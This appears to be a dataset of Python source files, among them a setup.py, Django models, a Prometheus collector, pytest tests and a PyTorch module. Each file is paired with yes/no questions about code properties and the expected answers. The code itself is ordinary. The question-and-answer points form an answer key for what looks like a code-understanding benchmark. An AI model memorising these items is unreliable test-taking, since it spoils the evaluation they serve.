source string | points list | n_points int64 | path string | repo string |
|---|---|---|---|---|
from setuptools import setup, find_packages
from setuptools.command.install import install
import os
import io
SETUP_DIR = os.path.dirname(os.path.abspath(__file__))
# List all of your Python package dependencies in the
# requirements.txt file
def readfile(filename, split=False):
with io.open(filename, encoding="utf-8") as stream:
if split:
return stream.read().split("\n")
return stream.read()
readme = readfile("README.rst", split=True)[3:] # skip title
# For requirements not hosted on PyPi place listings
# into the 'requirements.txt' file.
requires = [] # minimal requirements listing
source_license = readfile("LICENSE")
class InstallCommand(install):
def run(self):
install.run(self)
# Automatically install requirements from requirements.txt
import subprocess
subprocess.call(['pip', 'install', '-r', os.path.join(SETUP_DIR, 'requirements.txt')])
setup(name='mapclientplugins.datatrimmerstep',
version='0.1.0',
description='',
long_description='\n'.join(readme) + source_license,
classifiers=[
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
],
cmdclass={'install': InstallCommand,},
author='Mahyar Osanlouy',
author_email='',
url='',
license='APACHE',
packages=find_packages(exclude=['ez_setup',]),
namespace_packages=['mapclientplugins'],
include_package_data=True,
zip_safe=False,
install_requires=requires,
)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | setup.py | rchristie/mapclientplugins.datatrimmerstep |
from django.db import models
import os
def get_image_path(instance, filename):
return os.path.join('pics', str(instance.id), filename)
# Create your models here.
class Pets(models.Model):
pet_foto = models.ImageField(upload_to=get_image_path, blank=True, null=True)
DOG = 'C'
CAT = 'G'
ESPECIE_CHOICES = (
(DOG, 'Cachorro'),
(CAT, 'Gato')
)
especie = models.CharField(max_length=1, choices=ESPECIE_CHOICES, default=DOG)
PEQ = 'Pq'
MED = 'Md'
GDE = 'Gd'
PORTE_CHOICES = (
(PEQ, 'Pequeno'),
(MED, 'Médio'),
(GDE, 'Grande')
)
porte = models.CharField(max_length=2, choices=PORTE_CHOICES, default=GDE)
FILHOTE = 'F'
ADULTO = 'A'
IDADE_CHOICES = (
(FILHOTE, 'Filhote'),
(ADULTO, 'Adulto')
)
nome = models.CharField(max_length=50, null=False)
idade = models.CharField(max_length=1, choices=IDADE_CHOICES, default=ADULTO)
raca = models.CharField(max_length=100, null=False)
obs = models.TextField(max_length=500, null=True, blank=True)
def __str__(self):
return "pet_foto: {}\nEspecie: {}\nPorte: {}\nNome: {}\nIdade: {}\nRaça: {}\nObs.: {}"\
.format(self.pet_foto, self.especie, self.porte, self.nome, self.idade, self.raca, self.obs)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | src/doghouse/models.py | JuniorGunner/ConcilBackendTest |
#!/usr/bin/env python
# -*- coding: utf-8
from __future__ import unicode_literals
import platform as pf
from . import core
class PlatformCollector(object):
"""Collector for python platform information"""
def __init__(self, registry=core.REGISTRY, platform=None):
self._platform = pf if platform is None else platform
info = self._info()
system = self._platform.system()
if system == "Java":
info.update(self._java())
self._metrics = [
self._add_metric("python_info", "Python platform information", info)
]
if registry:
registry.register(self)
def collect(self):
return self._metrics
@staticmethod
def _add_metric(name, documentation, data):
labels = data.keys()
values = [data[k] for k in labels]
g = core.GaugeMetricFamily(name, documentation, labels=labels)
g.add_metric(values, 1)
return g
def _info(self):
major, minor, patchlevel = self._platform.python_version_tuple()
return {
"version": self._platform.python_version(),
"implementation": self._platform.python_implementation(),
"major": major,
"minor": minor,
"patchlevel": patchlevel
}
def _java(self):
java_version, _, vminfo, osinfo = self._platform.java_ver()
vm_name, vm_release, vm_vendor = vminfo
return {
"jvm_version": java_version,
"jvm_release": vm_release,
"jvm_vendor": vm_vendor,
"jvm_name": vm_name
}
PLATFORM_COLLECTOR = PlatformCollector()
"""PlatformCollector in default Registry REGISTRY"""
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": ... | 3 | Python/venv/lib/python3.7/site-packages/prometheus_client/platform_collector.py | HenriqueBuzin/TCC |
# -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for deleting network peerings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import base
from googlecloudsdk.core import properties
class Delete(base.DeleteCommand):
"""Delete a Google Compute Engine network peering."""
@staticmethod
def Args(parser):
parser.add_argument(
'name',
help='The name of the peering to delete.')
parser.add_argument(
'--network',
required=True,
help='The name of the network in the current project containing the '
'peering.')
def Run(self, args):
"""Issues the request necessary for deleting the peering."""
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
client = holder.client
request = client.messages.ComputeNetworksRemovePeeringRequest(
network=args.network,
networksRemovePeeringRequest=(
client.messages.NetworksRemovePeeringRequest(name=args.name)),
project=properties.VALUES.core.project.GetOrFail())
return client.MakeRequests([(client.apitools_client.networks,
'RemovePeering', request)])
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | lib/surface/compute/networks/peerings/delete.py | kustodian/google-cloud-sdk |
"""Select2 view implementation."""
import json
from dal.views import BaseQuerySetView
from django import http
from django.utils.translation import ugettext as _
class Select2ViewMixin(object):
"""View mixin to render a JSON response for Select2."""
def get_results(self, context):
"""Return data for the 'results' key of the response."""
return [
{
'id': self.get_result_value(result),
'text': self.get_result_label(result),
} for result in context['object_list']
]
def render_to_response(self, context):
"""Return a JSON response in Select2 format."""
create_option = []
q = self.request.GET.get('q', None)
display_create_option = False
if self.create_field and q:
page_obj = context.get('page_obj', None)
if page_obj is None or page_obj.number == 1:
display_create_option = True
if display_create_option:
create_option = [{
'id': q,
'text': _('Create "%(new_value)s"') % {'new_value': q},
'create_id': True,
}]
return http.HttpResponse(
json.dumps({
'results': self.get_results(context) + create_option,
'pagination': {
'more': self.has_more(context)
}
}),
content_type='application/json',
)
class Select2QuerySetView(Select2ViewMixin, BaseQuerySetView):
"""List options for a Select2 widget."""
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": fals... | 3 | env/lib/python2.7/site-packages/dal_select2/views.py | NITKOSG/InfoGami |
from second.second import checkLinkedList, linked_list
import pytest
def test_1(list1):
actual = checkLinkedList(list1)
expected = False
assert actual == expected
def test_2(list2):
actual = checkLinkedList(list2)
expected = True
assert actual == expected
@pytest.fixture
def list1():
list1 = linked_list()
list1.insert("A")
list1.insert("B")
list1.insert("C")
return list1
@pytest.fixture
def list2():
list2 = linked_list()
list2.insert("A")
list2.insert("B")
list2.insert("A")
return list2
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer":... | 3 | Interviews/second/tests/test_second.py | makkahwi/data-structures-and-algorithms |
#!/usr/bin/env python
#encoding: utf8
import sys, rospy, math
from pimouse_ros.msg import MotorFreqs
from geometry_msgs.msg import Twist
class Motor():
def __init__(self):
if not self.set_power(True): sys.exit(1)
rospy.on_shutdown(self.set_power)
self.sub_raw = rospy.Subscriber('motor_raw', MotorFreqs, self.callback_raw_freq)
self.sub_cmd_vel = rospy.Subscriber('cmd_vel', Twist, self.callback_cmd_vel)
self.last_time = rospy.Time.now()
self.using_cmd_vel = False
def set_power(self, onoff=False):
en = "/dev/rtmotoren0"
try:
with open(en,'w') as f:
f.write("1\n" if onoff else "0\n")
self.is_on = onoff
return True
except:
rospy.logerr("cannot write to " + en)
return False
def set_raw_freq(self, left_hz, right_hz):
if not self.is_on:
rospy.logerr("not enpowered")
return
try:
with open("/dev/rtmotor_raw_l0",'w') as lf,\
open("/dev/rtmotor_raw_r0",'w') as rf:
lf.write(str(int(round(left_hz))) + "\n")
rf.write(str(int(round(right_hz))) + "\n")
except:
rospy.logerr("cannot write to rtmotor_raw_*")
def callback_raw_freq(self, message):
self.set_raw_freq(message.left_hz, message.right_hz)
def callback_cmd_vel(self, message):
forward_hz = 80000.0*message.linear.x/(9*math.pi)
rot_hz = 400.0*message.angular.z/math.pi
self.set_raw_freq(forward_hz-rot_hz, forward_hz+rot_hz)
self.using_cmd_vel = True
self.last_time = rospy.Time.now()
if __name__ == '__main__':
rospy.init_node('motors')
m = Motor()
rate = rospy.Rate(10)
while not rospy.is_shutdown():
if m.using_cmd_vel and rospy.Time.now().to_sec() - m.last_time.to_sec() >= 1.0:
m.set_raw_freq(0,0)
m.using_cmd_vel = False
rate.sleep()
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": ... | 3 | scripts/motors1.py | aoko5/pimouse_ros |
#
# @lc app=leetcode id=102 lang=python3
#
# [102] Binary Tree Level Order Traversal
#
# @lc code=start
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
from typing import List, Optional
class Solution:
def levelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:
ans = []
def _larger(n):
for i in range(len(ans), n + 1):
ans.append([])
def _traversal(node, depth):
if node != None:
_larger(depth)
tmp = ans[depth]
tmp.append(node.val)
_traversal(node.left, depth + 1)
_traversal(node.right, depth + 1)
_traversal(root, 0)
return ans
# @lc code=end
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answ... | 3 | Difficulty/Medium/102.binary-tree-level-order-traversal.py | ryderfang/LeetCode |
import time
import dlib
import cv2
from interface_dummy import Connection
class Main(object):
def __init__(self):
self.camera = cv2.VideoCapture(0)
self.camera.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
self.camera.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)
self.face_detector_dlib = dlib.get_frontal_face_detector()
self.face_detector_cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt2.xml")
self.connection = Connection()
self.connection.start()
def run(self):
while True:
s, image = self.camera.read()
if not s:continue
s = time.clock()
dets_dlib = self.face_detector_dlib(image, 1)
time_dlib = time.clock()-s
max_width = 0
for rectangle in dets_dlib:
if rectangle.width()>max_width:
max_width = rectangle.width()
if max_width>0:
sisi_depan = max_width/2
print(max_width)
self.connection.send("distance", str(max_width))
#~ s = time.clock()
#~ gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
#~ dets_cv2 = self.face_detector_cascade.detectMultiScale(
#~ gray,
#~ scaleFactor=1.1,
#~ minNeighbors=40,
#~ minSize=(30, 30),
#~ flags=cv2.CASCADE_SCALE_IMAGE,
#~ )
#~ time_cv2 = time.clock()-s
#~ if len(dets_cv2)>0 or len(dets_dlib):
#~ print(dets_cv2, time_cv2, " | ", dets_dlib, time_dlib)
app = Main()
app.run()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | facedistance/main.py | imakin/ProsesKiller |
from typing import Union, List, Tuple, Type
from deeprob.spn.structure.leaf import Leaf
from deeprob.spn.structure.node import Node, Sum, Product, bfs
def collect_nodes(root: Node) -> List[Node]:
"""
Get all the nodes in a SPN.
:param root: The root of the SPN.
:return: A list of nodes.
"""
return filter_nodes_by_type(root)
def filter_nodes_by_type(
root: Node,
ntype: Union[Type[Node], Tuple[Type[Node], ...]] = Node
) -> List[Union[Node, Leaf, Sum, Product]]:
"""
Get the nodes of some specified types in a SPN.
:param root: The root of the SPN.
:param ntype: The node type. Multiple node types can be specified as a tuple.
:return: A list of nodes of some specific types.
"""
return list(filter(lambda n: isinstance(n, ntype), bfs(root)))
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return t... | 3 | deeprob/spn/utils/filter.py | fedelux3/deeprob-kit |
import pytest
import sys
import trio
import inspect
import re
import time
pytestmark = pytest.mark.trio
io_test_pattern = re.compile("io_.*")
async def tests(subtests):
def find_io_tests(subtests, ignored_names):
functions = inspect.getmembers(sys.modules[__name__], inspect.isfunction)
for (f_name, function) in functions:
if f_name in ignored_names:
continue
if re.search(io_test_pattern, f_name):
yield (run, subtests, f_name, function)
async def run(subtests, test_name, test_function):
with subtests.test(msg=test_name):
await test_function()
self_name = inspect.currentframe().f_code.co_name
async with trio.open_nursery() as nursery:
for io_test in find_io_tests(subtests, {self_name}):
nursery.start_soon(*io_test)
accepted_error = 0.1
async def io_test_1():
await assert_sleep_duration_ok(1)
async def io_test_2():
await assert_sleep_duration_ok(2)
async def io_test_3():
await assert_sleep_duration_ok(3)
async def io_test_4():
await assert_sleep_duration_ok(4)
async def assert_sleep_duration_ok(duration):
start = time.time()
await trio.sleep(duration)
actual_duration = time.time() - start
assert abs(actual_duration - duration) < accepted_error
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (e... | 3 | tests/base_test.py | ibalagurov/async_api_tests |
class Super(object):
attribute = 3
def func(self):
return 1
class Inner():
pass
class Sub(Super):
#? 13 Sub.attribute
def attribute(self):
pass
#! 8 ['attribute = 3']
def attribute(self):
pass
#! 4 ['def func']
func = 3
#! 12 ['def func']
class func(): pass
#! 8 ['class Inner']
def Inner(self): pass
# -----------------
# Finding self
# -----------------
class Test1:
class Test2:
def __init__(self):
self.foo_nested = 0
#? ['foo_nested']
self.foo_
#?
self.foo_here
def __init__(self, self2):
self.foo_here = 3
#? ['foo_here', 'foo_in_func']
self.foo_
#? int()
self.foo_here
#?
self.foo_nested
#?
self.foo_not_on_self
#? float()
self.foo_in_func
self2.foo_on_second = ''
def closure():
self.foo_in_func = 4.
def bar(self):
self = 3
self.foo_not_on_self = 3
class SubTest(Test1):
def __init__(self):
self.foo_sub_class = list
def bar(self):
#? ['foo_here', 'foo_in_func', 'foo_sub_class']
self.foo_
#? int()
self.foo_here
#?
self.foo_nested
#?
self.foo_not_on_self
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answe... | 3 | test/completion/inheritance.py | mrclary/jedi |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
Steps:
1. Given a CSV export of F_YL_LEARNER
2. Create a unique list of all IBM email addresses
3. Perform a lookup in the Bluepages API
4. Populate MongoDB with this information
5. Then create a DbViz insert file of the Bluepages API information
"""
import codecs
from databp import QueryBluepagesEndpoint
def load_csv_file(f_yl_learner_input): # STEP 1 and 2
fo = codecs.open(f_yl_learner_input, "r", encoding="utf-8")
lines = fo.readlines()
fo.close()
lines = [x.split("\t")[3].strip().replace('"', '') for x in lines[1:]]
print("Total Email Addresses: ", len(lines))
return lines
def bluepages_lookup(email_addresses):
total_loaded = QueryBluepagesEndpoint().by_internet_address_bulk(email_addresses)
print("Total Loaded: ", total_loaded)
def main(f_yl_learner_input):
email_addresses = load_csv_file(f_yl_learner_input)
bluepages_lookup(email_addresses)
if __name__ == "__main__":
import plac
plac.call(main)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | python/databp/scripts/bp_query_via_fyllearner.py | jiportilla/ontology |
from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV.json')
def test_storage_encoding_KT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
... | 3 | tests/storage/cases/test_KT1HodLKwRxAWonG3jzAdHmVmKvPiNaXbpxV.py | juztin/pytezos-1 |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from abc import ABC, abstractmethod
class AbstractLogger(ABC):
"""
Abstract base class for all the logger implementations of this tool
"""
__debug = False
@abstractmethod
def info(self, tag, message):
raise NotImplementedError
@abstractmethod
def error(self, tag, message):
raise NotImplementedError
@abstractmethod
def debug(self, tag, message):
raise NotImplementedError
@abstractmethod
def warn(self, tag, message):
raise NotImplementedError
def enable_debug(self):
self.__debug = True
def debug_enabled(self):
return self.__debug
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | core/interfaces/logger.py | microsoft/Guardinel |
from glob import glob
import config
import errno
import os
def unique_id(msg):
ext = '.txt'
f = glob("*"+ext)[0]
num_trail = int(f.split(".")[0])
newf = "./" + str(num_trail+1) + ext
os.rename(f, newf)
outdir = os.path.join("../weights", config.summary_prefix+"%02d"%num_trail)
mkdir_p(outdir)
f= open(outdir + "/msg.txt","w+")
f.write(msg)
f.close()
return num_trail
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | train/faci_training.py | Dung-Han-Lee/Pointcloud-based-Row-Detection-using-ShellNet-and-PyTorch |
import os
from dotenv import load_dotenv
from helpers import RequestHandler
class Order(RequestHandler):
def place_order(self, isin: str, expires_at: str, quantity: int, side: str):
load_dotenv()
order_details = {
"isin": isin,
"expires_at": expires_at,
"side": side,
"quantity": quantity,
"venue": os.getenv("MIC")
}
endpoint = f'orders/'
response = self.post_data(endpoint, order_details)
return response
def activate_order(self, order_id):
endpoint = f'orders/{order_id}/activate/'
response = self.post_data(endpoint, {})
return response
def get_order(self, order_id):
load_dotenv()
endpoint = f'orders/{order_id}/'
response = self.get_data_trading(endpoint)
return response
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | models/Order.py | lemon-markets/content-dollar-cost-average |
import pygame
from random import randint
BLACK = (0,0,0)
import numpy as np
class Ball(pygame.sprite.Sprite):
def __init__(self, color , width ,height, twidth, theight):
super().__init__()
self.image = pygame.Surface([width,height])
self.image.fill(BLACK)
self.image.set_colorkey(BLACK)
self.twidth = twidth
self.width = width
self.theight = theight
self.height = height
pygame.draw.rect(self.image,color , [0,0,width, height])
self.velocity = [randint(4,8),randint(-8,8)]
self.rect = self.image.get_rect()
def update(self):
self.rect.x = min(max(self.rect.x+self.velocity[0],0),self.twidth-self.width)
## Clipping solves a lot of glitches should have done this earlier
self.rect.y = min(max(self.rect.y+self.velocity[1],0),self.theight-self.height)
## Clipping solves a lot of glitches should have done this earlier
def bounce(self):
self.velocity[0] *= -1
self.velocity[1] = randint(-8,8)
def posi(self):
return self.rect
def spawn(self):
self.velocity = [ np.random.choice([-1,1])*randint(4,8) ,randint(-8,8)]
self.rect.x = (self.twidth - self.width) / 2
self.rect.y = (self.theight - self.height) / 2
return True
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cla... | 3 | ball.py | hex-plex/Pong-ReinforcementLearning |
import numpy as np
import matplotlib.pyplot as plt
# Part A: Numerical Differentiation Closure
def numerical_diff(f,h):
def inner(x):
return (f(x+h) - f(x))/h
return inner
# Part B:
f = np.log
x = np.linspace(0.2, 0.4, 500)
h = [1e-1, 1e-7, 1e-15]
y_analytical = 1/x
result = {}
for i in h:
y = numerical_diff(f,i)(x)
result[i] = y
# Plotting
plt.figure(figsize = (8,5))
plt.plot(x, y_analytical, 'x-', label='Analytical Derivative')
for i in h:
plt.plot(x, result[i], label='Estimated derivative h = '+str(i))
plt.xlabel("X value")
plt.ylabel("Derivative Value at X")
plt.title("Differentiation Value at X on various h value")
plt.legend()
# Part C:
print("Answer to Q-a: When h value is 1e-7, it most closely approximates the true derivative. \n",
"When h value is too small: The approximation is jumping around stepwise and not displaying a smooth curve approximation, it amplifies floating point errors in numerical operation such as rounding and division\n",
"When h value is too large: The approximation is lower than the true value, it doesn't provide a good approximation to the derivative\n")
print("Answer to Q-b: Automatic differentiation avoids the problem of not choosing a good h value. \n"
"The finite difference approach is quick and easy but suffers from accuracy and stability problems.\n"
"Symbolic derivatives can be evaluated to machine precision, but can be costly to evaluate.\n"
"Automatic differentiation (AD) overcomes both of these deficiencies. It is less costly than symbolic differentiation while evaluating derivatives to machine precision.\n"
"AD uses forward or backward modes to differentiate, via Computational Graph, chain rule and evaluation trace.")
# Show plot
plt.show()
# plt.savefig('P1_fig.png')
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (e... | 3 | homework/HW4/HW4-final/P1.py | TangJiahui/cs107_system_devlopment |
from typing import List, TypeVar, Sequence, Dict, Tuple
from polyhedral_analysis.coordination_polyhedron import CoordinationPolyhedron
T = TypeVar('T')
"""
Utility functions
"""
def flatten(this_list: Sequence[Sequence[T]]) -> List[T]:
"""Flattens a nested list.
Args:
(list): A list of lists.
Returns:
(list): The flattened list.
"""
return [item for sublist in this_list for item in sublist]
def lattice_mc_string(polyhedron: CoordinationPolyhedron,
neighbour_list: Dict[int, Tuple[int, ...]]) -> str:
"""Returns a string representation of a polyhedron as a `lattice_mc`_
site-input formatted site.
.. _lattice_mc: https://github.com/bjmorgan/lattice_mc
Args:
polyhedron (CoordinationPolyhedron): The coordination polyhedron.
neighbour_list (dict): Neighbour list dictionary.
Returns:
str
Example:
>>> nlist = {1: (3, 5, 8), ...}
>>> lattice_mc_string(polyhedron, neighbour_list=nlist
site: 1
centre: 2.94651000 1.70116834 1.20290767
neighbours: 3 5 8
label: oct
"""
string = f'site: {polyhedron.index}\n'
string += f'centre: {" ".join(f"{c:.8f}" for c in polyhedron.central_atom.coords)}\n'
string += f'neighbours: {" ".join(str(i) for i in neighbour_list[polyhedron.index])}\n'
string += f'label: {polyhedron.label}\n'
return string
def prune_neighbour_list(neighbours: Dict[int, Tuple[int, ...]],
indices: List[int]) -> Dict[int, Tuple[int, ...]]:
"""TODO"""
pruned_neighbours = {}
for k, v in neighbours.items():
if k in indices:
pruned_neighbours[k] = tuple(set(v).intersection(set(indices)))
return pruned_neighbours
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer... | 4 | polyhedral_analysis/utils.py | bjmorgan/polyhedral-analysis |
from rest_framework import serializers
from carts.models import Cart
from merchandises.models import Merchandise
from django.contrib.auth import get_user_model
from rest_framework.validators import UniqueTogetherValidator
from django.db.models import Sum, Avg, Count
class CartSerializer(serializers.ModelSerializer):
item_name = serializers.SerializerMethodField()
customer = serializers.StringRelatedField()
customer_email = serializers.SerializerMethodField()
merchant = serializers.StringRelatedField()
item_price = serializers.SerializerMethodField()
item_price_dec = serializers.SerializerMethodField()
item_merchant_email = serializers.SerializerMethodField()
on_stock = serializers.SerializerMethodField()
created = serializers.SerializerMethodField()
class Meta:
model = Cart
fields = '__all__'
def get_item_name(self, instance):
return instance.item.title
def get_customer_email(self, instance):
return instance.customer.email
def get_item_merchant(self, instance):
return instance.item.merchant.username
def get_item_merchant_email(self, instance):
return instance.item.merchant.email
def get_item_price(self, instance):
return instance.item.price
def get_item_price_dec(self, instance):
return instance.item.price_dec
def get_on_stock(self, instance):
return instance.item.on_stock
def get_created(self, instance):
return instance.created.strftime('%B %d %Y')
# def get_total_pieces(self, obj):
# totalpieces = Catalog.objects.all().aggregate(total_pieces=Count('no_of_pcs'))
# return totalpieces["total_pieces"]
# def get_total_price(self, obj):
# totalprice = Catalog.objects.all().aggregate(total_price=Sum('per_piece_price'))
# return totalprice["total_price"]
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | carts/api/serializers.py | it-teaching-abo-akademi/webshop-project-arnelimperial |
# 6. Больше числа п. В программе напишите функцию, которая принимает два
# аргумента: список и число п. Допустим, что список содержит числа. Функция
# должна показать все числа в списке, которые больше п.
import random
def main():
list_num = [random.randint(0, 100) for i in range(20)]
print(list_num)
n = int(input('entered n: '))
print("This is list " + str(check_n(list_num, n)) + " of numbers\nthat are "
"greater than the number you provided ", n, ".", sep="")
def check_n(list_num, n):
num_greater_n = []
for i in range(len(list_num)):
if list_num[i] > n:
num_greater_n.append(list_num[i])
return num_greater_n
main()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | chapter_07/06_larger_than_n.py | SergeHall/Tony-Gaddis-Python-4th |
from ..utils import Object
class GetLoginUrl(Object):
"""
Returns an HTTP URL which can be used to automatically authorize the user on a website after clicking an inline button of type inlineKeyboardButtonTypeLoginUrl.Use the method getLoginUrlInfo to find whether a prior user confirmation is needed. If an error is returned, then the button must be handled as an ordinary URL button
Attributes:
ID (:obj:`str`): ``GetLoginUrl``
Args:
chat_id (:obj:`int`):
Chat identifier of the message with the button
message_id (:obj:`int`):
Message identifier of the message with the button
button_id (:obj:`int`):
Button identifier
allow_write_access (:obj:`bool`):
True, if the user allowed the bot to send them messages
Returns:
HttpUrl
Raises:
:class:`telegram.Error`
"""
ID = "getLoginUrl"
def __init__(self, chat_id, message_id, button_id, allow_write_access, extra=None, **kwargs):
self.extra = extra
self.chat_id = chat_id # int
self.message_id = message_id # int
self.button_id = button_id # int
self.allow_write_access = allow_write_access # bool
@staticmethod
def read(q: dict, *args) -> "GetLoginUrl":
chat_id = q.get('chat_id')
message_id = q.get('message_id')
button_id = q.get('button_id')
allow_write_access = q.get('allow_write_access')
return GetLoginUrl(chat_id, message_id, button_id, allow_write_access)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | pytglib/api/functions/get_login_url.py | iTeam-co/pytglib |
import torch
import torch.nn as nn
class ComplexResGate(nn.Module):
def __init__(self, embedding_size):
super(ComplexResGate, self).__init__()
self.fc1 = nn.Linear(2*embedding_size, 2*embedding_size)
self.fc2 = nn.Linear(2*embedding_size, embedding_size)
self.sigmoid = nn.Sigmoid()
def forward(self, m, m_tild):
m_concat = torch.cat((m, m_tild), dim=2)
x = self.fc1(m_concat)
z = self.sigmoid(x)
y = self.fc2(z * m_concat)
# return y, None, None
return y
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
